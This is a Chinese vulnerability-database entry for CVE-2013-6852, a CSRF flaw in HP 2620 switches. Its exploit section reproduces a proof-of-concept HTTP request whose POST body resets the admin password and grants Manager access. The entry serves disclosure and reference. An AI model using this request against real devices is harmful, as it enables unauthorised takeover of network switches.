HP 2620交换机跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121881 漏洞类型 跨站请求伪造
发布时间 2013-09-26 更新时间 2013-11-25
CVE编号 CVE-2013-6852 CNNVD-ID CNNVD-201311-339
漏洞平台 Hardware CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/28562
https://www.securityfocus.com/bid/63690
https://cxsecurity.com/issue/WLB-2013110161
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201311-339
|漏洞详情
HP2620Switches是美国惠普(HP)公司推出的2620系列交换机。该系列交换机支持IPV4/IPv6静态和RIP路由功能。HP2620交换机上的html/json.html页面中存在跨站请求伪造漏洞。远程攻击者可通过使用‘setPassword’方法利用该漏洞更改管理员密码。
|漏洞EXP
# Exploit Title: Hewlett-Packard 2620 Switch Series. Edit Admin Account - CSRF Vulnerability
# Date: 26.09.2013r.
# Exploit Author: Hubert GrÄ…dek (PL)
# Software Link: [download link if available]
# Tested on: HP-E2620 24-PoEP //  RA.15.05.0006,ROMRA.15.10

HTTP Headers:

http://[IP_ADDR]/html/json.html

Host: [IP_ADDR]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://[IP_ADDR]/html/nhome.html
Cookie: sessionId=ANYTHING
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache





POST Content:


method:setPassword&name=admin&password=newpassword&ext-comp-1171=newpassword&access=Manager
|参考资料

来源:EXPLOIT-DB
名称:28562
链接:http://www.exploit-db.com/exploits/28562/